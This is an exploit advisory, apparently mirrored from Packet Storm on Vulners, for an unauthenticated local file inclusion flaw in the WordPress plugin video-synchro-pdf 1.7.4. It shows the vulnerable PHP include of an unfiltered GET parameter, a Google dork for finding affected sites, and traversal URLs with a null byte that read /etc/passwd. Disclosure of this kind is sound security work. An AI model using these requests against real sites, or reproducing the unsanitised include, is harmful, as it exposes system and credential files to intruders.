Lucene search
K

WordPress Video-Synchro-PDF 1.7.4 Local File Inclusion

🗓️ 30 Mar 2022 00:00:00Reported by Hassan Khan YusufzaiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 248 Views

WordPress Video-Synchro-PDF 1.7.4 Local File Inclusion vulnerabilit

Code
`# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File  
Inclusion - Unauthenticated  
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/  
# Date: 29-03-2022  
# Exploit Author: Hassan Khan Yusufzai - Splint3r7  
# Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/  
# Version: 1.7.4  
# Contact me: h [at] spidersilk.com  
  
# Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php  
  
# Vulnerable Code:  
  
```  
<?php  
if ($_GET['p']<=NULL) {  
include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');  
}else{  
include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');  
}  
```  
  
# Proof of Concept:  
  
http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=  
<http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI]  
http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=  
<http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>../../../../../../../../../etc/passwd%00  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2022 00:00Current
7.4High risk
Vulners AI Score7.4
248